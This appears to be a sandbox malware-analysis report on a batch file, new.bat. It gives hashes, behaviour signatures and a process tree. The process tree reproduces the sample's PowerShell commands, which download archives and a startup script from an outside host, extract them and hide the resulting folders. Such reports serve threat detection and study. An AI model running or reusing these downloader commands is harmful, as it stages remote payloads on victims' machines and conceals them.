Resubmissions

  • 15-08-2024 18:38  240815-xaelbs1hpj  10
  • 15-08-2024 18:24  240815-w14sgawfrc  8

Analysis

  • max time kernel: 361s
  • max time network: 362s
  • platform: windows7_x64
  • resource: win7-20240729-en
  • resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted: 15-08-2024 18:24

General

  • Target: new.bat
  • Size: 18.0MB
  • MD5: 35168f928a81982fc428113f484ea21e
  • SHA1: 2029d685911c351cea2857e12c1755df330e4978
  • SHA256: 496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344
  • SHA512: 4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec
  • SSDEEP: 48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2860
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2664
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2696

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 6dc2d9da0f8bcca40cf042ba71943219
    SHA1: b0b6e95baff77ac0b1647a26cca553808e065352
    SHA256: c268eb7be034b85b370e73efa29ddef098b2c97e92f9dd865d5d970c08699fb0
    SHA512: 5abfe232352c3fdd127f692134225fe46b9aa3349478b7b74911ce9ca2170a1145fe44b02f589e2997290b3d1117520bb74d39bf9f6d5360747d4319c0a7f74a
  • memory/2428-11-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp (Filesize: 9.6MB)
  • memory/2428-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp (Filesize: 9.6MB)
  • memory/2428-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp (Filesize: 9.6MB)
  • memory/2428-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp (Filesize: 9.6MB)
  • memory/2428-7-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp (Filesize: 9.6MB)
  • memory/2428-6-0x0000000002810000-0x0000000002818000-memory.dmp (Filesize: 32KB)
  • memory/2428-5-0x000000001B620000-0x000000001B902000-memory.dmp (Filesize: 2.9MB)
  • memory/2428-4-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp (Filesize: 4KB)
  • memory/2860-18-0x0000000002310000-0x0000000002318000-memory.dmp (Filesize: 32KB)
  • memory/2860-17-0x000000001B6F0000-0x000000001B9D2000-memory.dmp (Filesize: 2.9MB)